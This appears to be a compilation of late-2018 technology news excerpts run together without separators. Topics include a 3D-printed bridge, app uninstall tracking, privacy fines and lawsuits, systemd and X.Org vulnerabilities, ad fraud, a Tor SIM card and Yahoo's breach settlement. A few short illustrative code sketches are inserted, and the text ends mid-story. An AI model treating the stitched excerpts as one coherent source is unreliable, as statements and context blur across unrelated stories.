The creators of the world’s first 3D-printed steel bridge, a 40-foot stainless steel structure titled simply “The Bridge” that looks tantalizingly otherworldly thanks to its unique construction method, say it is now ready for installation in Amsterdam following its week on show at Dutch Design Week, which runs Oct. 20-28.
Photo: MX3D (Joris Laarman Lab)
The team at MX3D, which originally planned to build the Joris Laarman Lab-designed bridge in mid-air over a canal but later opted to construct it in a controlled environment away from pedestrians, told Gizmodo in a statement that it is now ready to commence the structure’s final installation in Amsterdam’s famed De Wallen red-light district. They’ve also shared a number of photos from the finished bridge, which is designed to look like two billowing sheets connected by organic curves of steel, on display at the festival. It looks fantastic:
“The Bridge” on display at Dutch Design Week.
Photo: MX3D (Adriaan de Groot)
As the construction method is new and has not previously been used in any such large-scale project, MX3D worked with Amsterdam officials to develop a new safety standard and has also coordinated with partners including the UK’s Alan Turing Institute to equip the bridge with a network of sensors. MX3D told Gizmodo that once in place, the structure will be capable of collecting data on “bridge traffic, structural integrity, and the surrounding neighborhood and environment,” with the information being “used as input for a ‘digital twin’ of the bridge” that will be monitored to detect any safety issues. A steel deck on the bottom of the bridge should also provide additional stability.
If it seems as though the app you deleted last week is suddenly popping up everywhere, it may not be mere coincidence. Companies that cater to app makers have found ways to game both iOS and Android, enabling them to figure out which users have uninstalled a given piece of software lately—and making it easy to pelt the departed with ads aimed at winning them back.
Adjust, AppsFlyer, MoEngage, Localytics, and CleverTap are among the companies that offer uninstall trackers, usually as part of a broader set of developer tools. Their customers include T-Mobile US, Spotify Technology, and Yelp. (And Bloomberg Businessweek parent Bloomberg LP, which uses Localytics.) Critics say they’re a fresh reason to reassess online privacy rights and limit what companies can do with user data. “Most tech companies are not giving people nuanced privacy choices, if they give them choices at all,” says Jeremy Gillula, tech policy director at the Electronic Frontier Foundation, a privacy advocate.
Some providers say these tracking tools are meant to measure user reaction to app updates and other changes. Jude McColgan, chief executive officer of Boston’s Localytics, says he hasn’t seen clients use the technology to target former users with ads. Ehren Maedge, vice president for marketing and sales at MoEngage Inc. in San Francisco, says it’s up to the app makers not to do so. “The dialogue is between our customers and their end users,” he says. “If they violate users’ trust, it’s not going to go well for them.” Adjust, AppsFlyer, and CleverTap didn’t respond to requests for comment, nor did T-Mobile, Spotify, or Yelp.
Uninstall tracking exploits a core element of Apple Inc.’s and Google’s mobile operating systems: push notifications. Developers have always been able to use so-called silent push notifications to ping installed apps at regular intervals without alerting the user—to refresh an inbox or social media feed while the app is running in the background, for example. But if the app doesn’t ping the developer back, it is logged as uninstalled, and the uninstall tracking tools add that change to the file associated with the given mobile device’s unique advertising ID. Those details make it easy to identify just who’s holding the phone and advertise the app to them wherever they go.
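The ping-and-timeout logic described above can be sketched in a few lines. This is a hypothetical illustration of the mechanism, not any vendor's actual code; the class name, the 24-hour timeout, and the advertising-ID strings are all invented for the example:

```python
from datetime import datetime, timedelta

# Illustrative threshold: if no silent-push acknowledgment arrives
# within this window, the app is presumed uninstalled.
PING_TIMEOUT = timedelta(hours=24)

class UninstallTracker:
    def __init__(self):
        # advertising_id -> timestamp of the last silent-push acknowledgment
        self.last_ack = {}
        self.retarget_audience = set()

    def record_ack(self, advertising_id, when):
        """Called when the installed app responds to a silent push."""
        self.last_ack[advertising_id] = when

    def sweep(self, now):
        """Flag devices whose app stopped pinging back as uninstalled."""
        for ad_id, seen in self.last_ack.items():
            if now - seen > PING_TIMEOUT:
                # No acknowledgment: log the uninstall against the device's
                # advertising ID and add it to a win-back ad audience.
                self.retarget_audience.add(ad_id)
        return self.retarget_audience

tracker = UninstallTracker()
t0 = datetime(2018, 10, 1, 12, 0)
tracker.record_ack("idfa-aaaa", t0)
tracker.record_ack("idfa-bbbb", t0)
tracker.record_ack("idfa-aaaa", t0 + timedelta(hours=30))  # still installed
audience = tracker.sweep(t0 + timedelta(hours=36))
print(sorted(audience))  # only the silent device is flagged
```

The key point is that the user never sees any of this: silent pushes produce no notification, so the only observable signal lives server-side, keyed to the advertising ID.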
The tools violate Apple and Google policies against using silent push notifications to build advertising audiences, says Alex Austin, CEO of Branch Metrics Inc., which makes software for developers but chose not to create an uninstall tracker. “It’s just generally sketchy to track people around the internet after they’ve opted out of using your product,” he says, adding that he expects Apple and Google to crack down on the practice soon. Apple and Google didn’t respond to requests for comment.
Facebook announced today that, thanks to new technology, it removed 8.7 million pieces of content last quarter that violated its rules against child exploitation. The new AI and machine learning tech, which the company developed and implemented over the past year, removed 99 percent of those posts before anyone reported them, said Antigone Davis, Facebook’s global head of safety, in a blog post.
The new technology examines posts for child nudity and other exploitative content when they are uploaded and, if necessary, photos and accounts are reported to the National Center for Missing and Exploited Children. Facebook had already been using photo-matching technology to compare newly uploaded photos with known images of child exploitation and revenge porn, but the new tools are meant to prevent previously unidentified content from being disseminated through its platform.
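The photo-matching approach mentioned above works by comparing a digest of each newly uploaded image against a database of digests of known illegal content. The sketch below is a toy version of that idea: real systems such as PhotoDNA use perceptual hashes that survive resizing and re-encoding, whereas this example uses an exact SHA-256 match, which only catches byte-identical copies:

```python
import hashlib

# Database of digests of previously identified images (illustrative).
known_hashes = set()

def register_known_image(image_bytes):
    """Add a known image's digest to the match database."""
    known_hashes.add(hashlib.sha256(image_bytes).hexdigest())

def is_known_image(image_bytes):
    """Check a newly uploaded image against the database of known content."""
    return hashlib.sha256(image_bytes).hexdigest() in known_hashes

register_known_image(b"previously-flagged-image-bytes")
print(is_known_image(b"previously-flagged-image-bytes"))  # True
print(is_known_image(b"never-seen-image-bytes"))          # False
```

The new tools Facebook describes go a step further than this kind of lookup: rather than matching against known images, a classifier tries to flag exploitative content that has never been seen before.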
The technology isn’t perfect, with many parents complaining that innocuous photos of their kids have been removed. Davis addressed this in her post, writing that in order to “avoid even the potential for abuse, we take action on nonsexual content as well, like seemingly benign photos of children in the bath” and that this “comprehensive approach” is one reason Facebook removed as much content as it did last quarter.
But Facebook’s moderation technology is by no means perfect and many people believe it is not comprehensive or accurate enough. In addition to family snapshots, it’s also been criticized for removing content like the iconic 1972 photo of Phan Thi Kim Phuc, known as the “Napalm Girl,” fleeing naked after suffering third-degree burns in a South Vietnamese napalm attack on her village, a decision COO Sheryl Sandberg apologized for.
The UK’s Information Commissioner has formally fined Facebook £500,000 – the maximum available – over the Cambridge Analytica scandal.
In a monetary penalty notice issued this morning, the Information Commissioner’s Office (ICO) stated that the social media network had broken two of the UK’s legally binding data protection principles by allowing Cambridge academic Aleksandr Kogan to harvest 87 million Facebook users’ personal data through an app disguised as an innocent online quiz.
“Facebook… failed to keep the personal information secure because it failed to make suitable checks on apps and developers using its platform. These failings meant one developer, Dr Aleksandr Kogan and his company GSR, harvested the Facebook data of up to 87 million people worldwide, without their knowledge,” said the ICO in its statement on the fine.
“The Facebook Companies thereby acted in breach of section 4(4) of the [Data Protection Act], which at all material time required data controllers to comply with the data protection principles in relation to all personal data in respect of which they were the data controller,” continued the ICO in its penalty notice (PDF, 27 pages).
The £500k fine is the maximum penalty available to the ICO under 1998’s Data Protection Act. The regulator noted: “But for the statutory limitation on the amount of the monetary penalty, it would have been reasonable and proportionate to impose a higher penalty.” Nonetheless, with Facebook making a net income of $5.1bn in its latest fiscal quarter, the penalty amounts to just over a quarter of an hour’s profit.
In a landmark study, 20 top US corporate lawyers with decades of experience in corporate law and contract review were pitted against an AI. Their task was to spot issues in five Non-Disclosure Agreements (NDAs), which are a contractual basis for most business deals.
The study, carried out with leading legal academics and experts, saw the LawGeex AI achieve an average accuracy rate of 94%, higher than the lawyers, who achieved an average of 85%. It took the lawyers an average of 92 minutes to complete the NDA issue-spotting, compared to 26 seconds for the LawGeex AI. The longest time taken by a lawyer to complete the test was 156 minutes, and the shortest was 51 minutes. The study made waves around the world and was covered across global media.
A security bug in Systemd can be exploited over the network to, at best, potentially crash a vulnerable Linux machine, or, at worst, execute malicious code on the box.
The flaw therefore puts Systemd-powered Linux computers – specifically those using systemd-networkd – at risk of remote hijacking: maliciously crafted DHCPv6 packets can try to exploit the programming cockup and arbitrarily change parts of memory in vulnerable systems, leading to potential code execution. This code could install malware, spyware, and other nasties, if successful.
The vulnerability – which was made public this week – sits within the written-from-scratch DHCPv6 client of the open-source Systemd management suite, which is built into various flavors of Linux.
This client is activated automatically if IPv6 support is enabled, and relevant packets arrive for processing. Thus, a rogue DHCPv6 server on a network, or in an ISP, could emit specially crafted router advertisement messages that wake up these clients, exploit the bug, and possibly hijack or crash vulnerable Systemd-powered Linux machines.
systemd-networkd is vulnerable to an out-of-bounds heap write in the DHCPv6 client when handling options sent by network-adjacent DHCP servers. An attacker could exploit this via a malicious DHCP server to corrupt heap memory on client machines, resulting in a denial of service or potential code execution.
A vulnerability that is trivial to exploit allows privilege escalation to root level on Linux and BSD distributions using X.Org server, the open source implementation of the X Window System that offers the graphical environment.
[…]
Three hours after the public announcement of the security gap, Daemon Security CEO Michael Shirk replied with one line that overwrote shadow files on the system. Hickey did one better and fit the entire local privilege escalation exploit in one line.
Apart from OpenBSD, other operating systems affected by the bug include Debian and Ubuntu, Fedora and its downstream distro Red Hat Enterprise Linux along with its community-supported counterpart CentOS.
AI can translate between languages in real time as people speak, according to fresh research from Chinese search giant Baidu and Oregon State University in the US.
Human interpreters need superhuman concentration to listen to speech and translate at the same time. There are, apparently, only a few thousand qualified simultaneous interpreters and the job is so taxing that they often work in pairs, swapping places after 20 to 30 minute stints. And as conversations progress, the chance for error increases exponentially.
Machines have the potential to trump humans at this task, considering they have superior memory and don’t suffer from fatigue. But it’s not so easy for them either, as researchers from Baidu and Oregon State University found.
They built a neural network that can translate from Mandarin Chinese to English in almost real time, with the English translation lagging behind by about five words. The results have been published in a paper on arXiv.
The babble post-Babel
Languages have different grammatical structures, and the word order of sentences often doesn’t match up, making it difficult to translate quickly. The key to a fast translation is predicting what the speaker will say next as he or she talks.
In the AI engine, an encoder converts the words of the source language into a vector representation. A decoder then predicts the probability of the next word in the target language given the words seen so far. The decoder always lags behind the encoder and keeps generating translated words until it has processed the whole speech or text.
“In one of the examples, the Chinese sentence ‘Bush President in Moscow…’ would suggest the next English word after ‘President Bush’ is likely ‘meets’,” Liang Huang, principal scientist at Baidu Research, explained to The Register.
“This is possible because in the training data we have a lot of ‘Bush meeting someone, like Putin in Moscow,’ so the system learned that if ‘Bush in Moscow,’ he is likely ‘meeting’ someone.”
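The read-and-write schedule this implies is often called “wait-k”: the decoder waits for the first k source words, then emits one target word for every new source word, flushing the remainder once the speaker finishes. Here is a minimal sketch of that schedule, with the neural decoder stubbed out by a toy word-for-word function (all names here are illustrative, not Baidu's API):

```python
def wait_k_decode(source_stream, k, translate_word):
    """Emit one target word per new source word, lagging k words behind."""
    source_prefix, output = [], []
    for word in source_stream:
        source_prefix.append(word)
        if len(source_prefix) >= k:
            # In the real model, a neural decoder predicts the next target
            # word from the source prefix plus the target words so far.
            output.append(translate_word(source_prefix, output))
    # Source finished: flush the k-1 target words still owed.
    while len(output) < len(source_prefix):
        output.append(translate_word(source_prefix, output))
    return output

def toy_translate(prefix, out_so_far):
    # Stand-in for the decoder: "translate" source word i verbatim.
    return prefix[len(out_so_far)].upper()

src = "bush president in moscow meets putin".split()
print(wait_k_decode(src, k=3, translate_word=toy_translate))
# ['BUSH', 'PRESIDENT', 'IN', 'MOSCOW', 'MEETS', 'PUTIN']
```

The anticipation described in the quote lives inside the decoder: because it must commit to a target word while the source verb may still be unspoken, it effectively learns to predict likely continuations from the training data.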
The difficulty depends on the languages being translated, Huang added. Languages that are closely related, such as French and Spanish, have similar structures in which the order of words aligns more closely.
Japanese and German sentences are constructed with the subject at the front, the object in the middle, and the verb at the end (SOV). English and Chinese also starts with the subject, but the verb is in the middle, followed by the object (SVO).
Translating from Japanese or German to English or Chinese is therefore more difficult. “There is a well-known joke in the UN that a German-to-English interpreter often has to pause and ‘wait for the German verb.’ Standard Arabic and Welsh are verb-subject-object (VSO), which is even more different from SVO,” he said.
The new algorithm can be applied to any neural machine translation model and only involves tweaking the code slightly. It has already been integrated into Baidu’s internal speech-to-text translation and will be showcased at the Baidu World Tech Conference next week, on November 1 in Beijing.
“We don’t have an exact timeline for when this product will be available for the general public, this is certainly something Baidu is working on,” Liang said.
“We envision our technology making simultaneous translation much more accessible and affordable, as there is an increasing demand. We also envision the technology [will reduce] the burden on human translators.”
The Portuguese courts today issued a decision against Google in relation to the injunction filed by Aptoide. It applies in 82 countries, including the UK, Germany, the USA, and India. Google will have to stop Google Play Protect from removing the competing Aptoide app store from users’ phones without their knowledge, a practice Aptoide says has cost it over 2.2 million users in the last 60 days.
The acceptance of the injunction is fully aligned with Aptoide’s demand that Google stop hiding the app store on Android devices and showing warning messages to users.
Aptoide is now working with its legal team to file the main action in court next week, demanding indemnity from Google for all the damages caused.
Aptoide, which has over 250 million users and 6 billion downloads and is one of the top app stores globally, filed a formal complaint this July with the European Union’s antitrust authorities against Google.
Paulo Trezentos, Aptoide’s CEO, says: “For us, this is a decisive victory. Google has been a fierce competitor, abusing its dominant position in Android to eliminate app store competitors. Innovation is the reason for our 200 million user base. This court decision is a signal for startups worldwide: if you have reason on your side, don’t fear challenging Google.”
About Aptoide
Founded in 2011 and based in Lisbon with offices in Shenzhen and Singapore, Aptoide is one of the top three Android app stores in the world. With over 200 million users, 4 billion downloads and 1 million apps, Aptoide is an app store that reinvents the app discovery experience through an online community, tailored recommendations and the opportunity for users to create and share their own personal app stores. The Aptoide App Store is available for Android mobile and TV devices and is accessible in over 40 languages. With an ever-growing community of users and partners worldwide, Aptoide is now one of the leading players in the world of apps.
A startup that claims to sell surveillance and hacking technologies to governments around the world left nearly all its data—including information taken from infected targets and victims—exposed online, according to the security firm that found the data.
Wolf Intelligence, a Germany-based spyware company that made headlines for sending a bodyguard to Mauritania and prompting an international incident after the local government detained the bodyguard as collateral when a deal went wrong, left a trove of its own data exposed online. The leak exposed 20 gigabytes of data, including recordings of meetings with customers, a scan of a passport belonging to the company’s founder, scans of the founder’s credit cards, and surveillance targets’ data, according to researchers.
Security researchers from CSIS Security discovered the data on an unprotected command and control server and a public Google Drive folder. The researchers showed screenshots of the leaked data during a talk at the Virus Bulletin conference in Montreal, which Motherboard attended.
“This is a very stupid story in the sense that you would think that a company actually selling surveillance tools like this would know more about operational security,” CSIS co-founder Peter Kruse told Motherboard in an interview. “They exposed themselves—literally everything was available publicly on the internet.”
In a statement on Wednesday, the Italian competition authority, the Autorità Garante della Concorrenza e del Mercato (AGCM), said both companies had violated consumer protection laws by “inducing customers to install updates on devices that are not able to adequately support them.”
It fined Apple €10m ($11.4m): €5m for slowing down the iPhone 6 with its iOS 10 update, and a further €5m for not providing customers with sufficient information about their devices’ batteries, including how to maintain and replace them. Apple banks millions of dollars an hour in profit.
Samsung was fined €5m for its Android Marshmallow 6.0.1 update, which was intended for the Galaxy Note 7 but which led to the Note 4 malfunctioning due to the upgrade’s demands.
Both companies deny they deliberately set out to slow down older phones, but the Italian authorities were not persuaded and clearly felt it was a case of “built-in obsolescence” – where products are designed to fall apart before they need to in order to drive sales of newer models.
It’s no secret that mobile apps harvest user data and share it with other companies, but the true extent of this practice may come as a surprise. In a new study carried out by researchers from Oxford University, it’s revealed that almost 90 percent of free apps on the Google Play store share data with Alphabet.
The researchers, who analyzed 959,000 apps from the US and UK Google Play stores, said data harvesting and sharing by mobile apps was now “out of control.”
“We find that most apps contain third party tracking, and the distribution of trackers is long-tailed with several highly dominant trackers accounting for a large portion of the coverage,” reads the report.
It’s revealed that most of the apps, 88.4 percent, could share data with companies owned by Google parent Alphabet. Next came a firm that’s no stranger to data sharing controversies, Facebook (42.5 percent), followed by Twitter (33.8 percent), Verizon (26.27 percent), Microsoft (22.75 percent), and Amazon (17.91 percent).
According to The Financial Times, which first reported the research, information shared by these third-party apps can include age, gender, location, and information about a user’s other installed apps. The data “enables construction of detailed profiles about individuals, which could include inferences about shopping habits, socio-economic class or likely political opinions.”
Big firms then use the data for a variety of purposes, such as credit scoring and for targeting political messages, but its main use is often ad targeting. Not surprising, given that revenue from online advertising is now over $59 billion per year.
According to the research, the average app transfers data to five tracker companies, which pass the data on to larger firms. The biggest culprits are news apps and those aimed at children, both of which tend to have the most third-party trackers associated with them.
Last April, Steven Schoen received an email from someone named Natalie Andrea who said she worked for a company called We Purchase Apps. She wanted to buy his Android app, Emoji Switcher. But right away, something seemed off.
“I did a little bit of digging because I was a little sketched out because I couldn’t really find even that the company existed,” Schoen told BuzzFeed News.
The We Purchase Apps website listed a location in New York, but the address appeared to be a residence. “And their phone number was British. It was just all over the place,” Schoen said.
It was all a bit weird, but nothing indicated he was about to see his app end up in the hands of an organization responsible for potentially hundreds of millions of dollars in ad fraud, and which has funneled money to a cabal of shell companies and people scattered across Israel, Serbia, Germany, Bulgaria, Malta, and elsewhere.
Schoen had a Skype call with Andrea and her colleague, who said his name was Zac Ezra, but whose full name is Tzachi Ezrati. They agreed on a price and to pay Schoen up front in bitcoin.
“I would say it was more than I had expected,” Schoen said of the price. That helped convince him to sell.
A similar scenario played out for five other app developers who told BuzzFeed News they sold their apps to We Purchase Apps or directly to Ezrati. (Ezrati told BuzzFeed News he was only hired to buy apps and had no idea what happened to them after they were acquired.)
The Google Play store pages for these apps were soon changed to list four different companies as their developers, with addresses in Bulgaria, Cyprus, and Russia, giving the appearance that the apps now had different owners.
But an investigation by BuzzFeed News reveals that these seemingly separate apps and companies are today part of a massive, sophisticated digital advertising fraud scheme involving more than 125 Android apps and websites connected to a network of front and shell companies in Cyprus, Malta, British Virgin Islands, Croatia, Bulgaria, and elsewhere. More than a dozen of the affected apps are targeted at kids or teens, and a person involved in the scheme estimates it has stolen hundreds of millions of dollars from brands whose ads were shown to bots instead of actual humans. (A full list of the apps, the websites, and their associated companies connected to the scheme can be found in this spreadsheet.)
One way the fraudsters find apps for their scheme is to acquire legitimate apps through We Purchase Apps and transfer them to shell companies. They then capture the behavior of the app’s human users and program a vast network of bots to mimic it, according to analysis from Protected Media, a cybersecurity and fraud detection firm that analyzed the apps and websites at BuzzFeed News’ request.
This means a significant portion of the millions of Android phone owners who downloaded these apps were secretly tracked as they scrolled and clicked inside the application. By copying actual user behavior in the apps, the fraudsters were able to generate fake traffic that bypassed major fraud detection systems.
“This is not your run-of-the-mill fraud scheme,” said Asaf Greiner, the CEO of Protected Media. “We are impressed with the complex methods that were used to build this fraud scheme and what’s equally as impressive is the ability of criminals to remain under the radar.”
Another fraud detection firm, Pixalate, first exposed one element of the scheme in June. At the time, it estimated that the fraud being committed by a single mobile app could generate $75 million a year in stolen ad revenue. After publishing its findings, Pixalate received an email from an anonymous person connected to the scheme who said the amount that’s been stolen was closer to 10 times that amount. The person also said the operation was so effective because it works “with the biggest partners [in digital advertising] to ensure the ongoing flow of advertisers and money.”
In total, the apps identified by BuzzFeed News have been installed on Android phones more than 115 million times, according to data from analytics service AppBrain. Most are games, but others include a flashlight app, a selfie app, and a healthy eating app. One app connected to the scheme, EverythingMe, has been installed more than 20 million times.
Once acquired, the apps continue to be maintained in order to keep real users happy and create the appearance of a thriving audience that serves as a cover for the cloned fake traffic. The apps are also spread among multiple shell companies to distribute earnings and conceal the size of the operation.
When President Trump calls old friends on one of his iPhones to gossip, gripe or solicit their latest take on how he is doing, American intelligence reports indicate that Chinese spies are often listening — and putting to use invaluable insights into how to best work the president and affect administration policy, current and former American officials said.
Mr. Trump’s aides have repeatedly warned him that his cellphone calls are not secure, and they have told him that Russian spies are routinely eavesdropping on the calls, as well. But aides say the voluble president, who has been pressured into using his secure White House landline more often these days, has still refused to give up his iPhones. White House officials say they can only hope he refrains from discussing classified information when he is on them.
Mr. Trump’s use of his iPhones was detailed by several current and former officials, who spoke on the condition of anonymity so they could discuss classified intelligence and sensitive security arrangements. The officials said they were doing so not to undermine Mr. Trump, but out of frustration with what they considered the president’s casual approach to electronic security.
American spy agencies, the officials said, had learned that China and Russia were eavesdropping on the president’s cellphone calls from human sources inside foreign governments and intercepting communications between foreign officials.
It’s increasingly difficult to expect privacy when you’re browsing online, so a non-profit in the UK is working to build the power of Tor’s anonymity network right into the heart of your smartphone.
Brass Horn Communications is experimenting with all sorts of ways to improve Tor’s usability for UK residents. The Tor browser bundle for PCs can help shield your IP address from snoopers and data-collection giants. It’s not perfect, and people using it for highly illegal activity can still get caught, but Tor’s system of sending your data through the various nodes on its network to anonymize user activity works for most people. It can help users surf the full web in countries with restrictive firewalls and simply make the average Joe feel like they have more privacy. But it’s prone to user error, especially on mobile devices. Brass Horn hopes to change that.
Brass Horn’s founder, Gareth Llewellyn, told Motherboard his organization is “about sticking a middle finger up to mobile filtering, mass surveillance.” Llewellyn has been unnerved by the UK’s relentless drive to push through legislation that enables surveillance and undermines encryption. Along with his efforts to build out more Tor nodes in the UK to increase its notoriously slow speeds, Llewellyn is now beta-testing a SIM card that will automatically route your data through Tor and save people the trouble of accidentally browsing unprotected.
Currently, mobile users’ primary option is to use the Tor browser that’s still in alpha-release and couple it with software called Orbot to funnel your app activity through the network. Only apps that have a proxy feature, like Twitter, are compatible. It’s also only available for Android users.
You’ll still need Orbot installed on your phone to use Brass Horn’s SIM card and the whole idea is that you won’t be able to get online without running on the Tor network. There’s some minor setup that the organization walks you through and from that point on, you’ll apparently never accidentally find yourself online without the privacy protections that Tor provides.
In an email to Gizmodo, Llewellyn said that he does not recommend using the card on a device with dual-SIMs. He said the whole point of the project is that a user “cannot accidentally send packets via Clearnet, this is to protect one’s privacy, anonymity and/or protect against NITs etc, if one were to use a dual SIM phone it would negate the failsafe and would not be advisable.” But if a user so desired, they could go with a dual-SIM setup.
You’re also unprotected if you end up on WiFi, but in general, this is a way for journalists, activists, and rightly cautious users to know they’re always protected.
The SIM acts as a provider and Brass Horn essentially functions as a mobile virtual network operator that piggybacks on other networks. The site for Brass Horn’s Onion3G service claims it’s a safer mobile provider because it only issues “private IP addresses to remote endpoints which if ‘leaked’ won’t identify you or Brass Horn Communications as your ISP.” It costs £2.00 per month and £0.025 per megabyte transferred over the network.
A spokesperson for the Tor Project told Gizmodo that it hasn’t been involved in this project and that protecting mobile data can be difficult. “This looks like an interesting and creative way to approach that, but it still requires that you put a lot of trust into your mobile provider in ensuring that no leaks happen,” they said.
Info on joining the beta is available here and Brass Horn expects to make its SIM card available to the general public in the UK next year. Most people should wait until there’s some independent research done on the service, but it’s all an intriguing idea that could provide a model for other countries.
Facebook and Google are being sued in two proposed class-action lawsuits for allegedly deceptively gathering location data on netizens who thought they had opted out of such cyber-stalking.
The legal challenges stem from revelations earlier this year that even after users actively turn off “location history” on their smartphones, their location is still gathered, stored, and exploited to sling adverts.
Both companies use weasel words in their support pages to continue to gather the valuable data while seemingly giving users the option to opt out – and that “deception” is at the heart of both lawsuits.
In the first, Facebook user Brett Heeger claims the antisocial network is misleading folks by providing the option to stop the gathering and storing of their location data, but in reality it continues to grab the information and add it to a “Location History” feature that it then uses for targeted advertising.
“Facebook misleads its users by offering them the option to restrict Facebook from tracking, logging and storing their private location information, but then continuing to track, log, and store that location information regardless of users’ choices,” the lawsuit, filed in California, USA, states. “In fact, Facebook secretly tracks, logs and stores location data for all of its users – including those who have sought to limit the information about their locations.”
This action is “deceptive” and offers users a “false sense of security,” the lawsuit alleges. “Facebook’s false assurances are intended to make users feel comfortable continuing to use Facebook and share their personal information so that Facebook can continue to be profitable, at the expense of user privacy… Advertisers pay Facebook to place advertisements because Facebook is so effective at using location information to target advertisements to consumers.”
And over to you, Google
In the second lawsuit, also filed in Cali, three people – Leslie Lee of Wyoming and Colorado residents Stacy Smedley and Fredrick Davis – make the same claim: that Google is deceiving smartphone users by giving them the option to “pause” the gathering of their location data through a setting called “Location History.”
In reality, however, Google continues to gather location data through its two most popular apps – Search and Maps – even when you actively choose to turn off location data. Instead, users have to go to a separate setting called “Web and App Activity” to really turn the gathering off. There is no mention of location data within that setting, and nowhere does Google refer people to it in order to really stop location tracking.
As such, Google is engaged in a “deliberate, deceptive practice to collect personal information from which they can generate millions of dollars in revenue by covertly recording contemporaneous location data about Android and iPhone mobile phone users who are using Google Maps or other Google applications and functionalities, but who have specifically opted out of such tracking,” the lawsuit alleges.
Both legal salvos hope to become class-action lawsuits with jury trials, so potentially millions of other affected users will be able to join the action and so propel the case forward. The lawsuits seek compensation and damages as well as injunctions preventing both companies from gathering such data without gaining the explicit consent of users.
Meanwhile, at the other end of the scale, the companies’ ability to constantly gather user location data has made them a target for law enforcement agencies trying to solve crimes.
Warrant required
Back in June, the US Supreme Court made a landmark ruling about location data, requiring cops and FBI agents to get a warrant before accessing such records from mobile phone operators.
But it is not clear what hurdles or parameters must be met before a court should sign off on such a warrant, leading to an increasing number of cases where the Feds have provided times, dates, and rough geographic locations and asked Google, Facebook, Snapchat, and others to provide the data of everyone who was in the vicinity at the time.
This so-called “reverse location” order has many civil liberties groups concerned because it effectively exposes innocent individuals’ personal data to the authorities simply because they were in the same rough area where a crime was carried out.
[…]
Leaky apps
And if all that wasn’t bad enough, this week a paper [PDF] by eggheads at the University of Oxford in the UK who studied the source code of just under one million apps found that Google and Facebook were top of the list when it came to gathering data on users from third parties.
Google parent company Alphabet receives user data from an incredible 88 per cent of apps on the market. Often this information was accumulated through third parties and included information like age, gender and location. The data “enables construction of detailed profiles about individuals, which could include inferences about shopping habits, socio-economic class or likely political opinions,” the paper revealed.
Facebook received data from 43 per cent of the apps, followed by Twitter with 34 per cent. Mobile operator Verizon – renowned for its “super cookie” tracker – gets information from 26 per cent of apps; Microsoft 23 per cent; and Amazon 18 per cent.
Yahoo has agreed to pay $50 million in damages and provide two years of free credit-monitoring services to 200 million people whose email addresses and other personal information were stolen as part of the biggest security breach in history.
The restitution hinges on federal court approval of a settlement filed late Monday in a 2-year-old lawsuit seeking to hold Yahoo accountable for digital burglaries that occurred in 2013 and 2014, but weren’t disclosed until 2016.
It adds to the financial fallout from a security lapse that provided a mortifying end to Yahoo’s existence as an independent company and former CEO Marissa Mayer’s six-year reign.
Yahoo revealed the problem after it had already negotiated a $4.83 billion deal to sell its digital services to Verizon Communications. It then had to discount that price by $350 million to reflect its tarnished brand and the specter of other potential costs stemming from the breach.
Verizon will now pay for one half of the settlement cost, with the other half paid by Altaba Inc., a company that was set up to hold Yahoo’s investments in Asian companies and other assets after the sale. Altaba already paid a $35 million fine imposed by the Securities and Exchange Commission for Yahoo’s delay in disclosing the breach to investors.
About 3 billion Yahoo accounts were hit by hackers, including some linked to Russia by the FBI. The settlement reached in a San Jose, California, court covers about 1 billion of those accounts held by an estimated 200 million people in the U.S. and Israel from 2012 through 2016.
Claims for a portion of the $50 million fund can be submitted by any eligible Yahoo accountholder who suffered losses resulting from the security breach. The costs can include such things as identity theft, delayed tax refunds or other problems linked to having had personal information pilfered during the Yahoo break-ins.
The fund will compensate Yahoo accountholders at a rate of $25 per hour for time spent dealing with issues triggered by the security breach, according to the preliminary settlement. Those with documented losses can ask for up to 15 hours of lost time, or $375. Those who can’t document losses can file claims seeking up to five hours, or $125, for their time spent dealing with the breach.
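Those tiers boil down to simple arithmetic. As a rough sketch (the hourly rate and caps come from the preliminary settlement; the function itself is just an illustration):

```python
def estimate_claim(hours_claimed: float, documented: bool) -> float:
    """Estimate a time-based cash claim under the settlement's tiers:
    $25/hour, capped at 15 hours with documentation, 5 hours without."""
    cap = 15 if documented else 5
    return min(hours_claimed, cap) * 25.0

# A claimant with receipts for 20 hours of cleanup is still capped at $375.
print(estimate_claim(20, documented=True))   # 375.0
# Without documentation, the same claimant tops out at $125.
print(estimate_claim(20, documented=False))  # 125.0
```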
Yahoo accountholders who paid $20 to $50 annually for a premium email account will be eligible for a 25 percent refund.
The free credit monitoring service from AllClear could end up being the most valuable part of the settlement for most accountholders. The lawyers representing the accountholders pegged the retail value of AllClear’s credit-monitoring service at $14.95 per month, or about $359 for two years — but it’s unlikely Yahoo will pay that rate. The settlement didn’t disclose how much Yahoo had agreed to pay AllClear for covering affected accountholders.
For those who don’t remember: Winamp was the MP3 player of choice around the turn of the century, but it went through a rocky period under Aol (our former parent company), failed to counter the likes of iTunes and the onslaught of streaming services, and more or less crumbled over the years. The original app, last updated in 2013, still works, but to say it’s long in the tooth would be something of an understatement (the community has worked hard to keep it updated, however). So it’s with pleasure that I can confirm rumors that substantial updates are on the way.
“There will be a completely new version next year, with the legacy of Winamp but a more complete listening experience,” said Alexandre Saboundjian, CEO of Radionomy, the company that bought Winamp (or what remained of it) in 2014. “You can listen to the MP3s you may have at home, but also to the cloud, to podcasts, to streaming radio stations, to a playlist you perhaps have built.”
“People want one single experience,” he concluded. “I think Winamp is the perfect player to bring that to everybody. And we want people to have it on every device.”
Laugh if you want but I laugh back
Now, I’m a Winamp user myself. And while I’ve been saddened by the drama through which the iconic MP3 player and the team that created it have gone (at the hands of TechCrunch’s former parent company, Aol), I can’t say I’ve been affected by it in any real way. Winamp 2 and 5 have taken me all the way from Windows 98 SE to 10 with nary a hiccup, and the player is docked just to the right of this browser window as I type this. (I use the nucleo_nlog skin.)
And although I bear the burden of my colleagues’ derisive comments for my choice of player, I’m far from alone. Winamp has as many as a hundred million monthly users, most of whom are outside the U.S. This real, engaged user base could be a powerful foot in the door for a new platform — mobile-first, but with plenty of love for the desktop too.
“Winamp users really are everywhere. It’s a huge number,” said Saboundjian. “We have a really strong and important community. But everybody ‘knows’ that Winamp is dead, that we don’t work on it any more. This is not the case.”
Boffins have devised a way to make eavesdropping smartwatches, computers, mobile devices, and speakers with endearing names like Alexa better aware of what’s going on around them.
In a paper to be presented today at the ACM Symposium on User Interface Software and Technology (UIST) in Berlin, Germany, computer scientists Gierad Laput, Karan Ahuja, Mayank Goel, and Chris Harrison describe a real-time, activity recognition system capable of interpreting collected sound.
In other words, software that uses devices’ always-on, built-in microphones to sense what exactly is going on in the background.
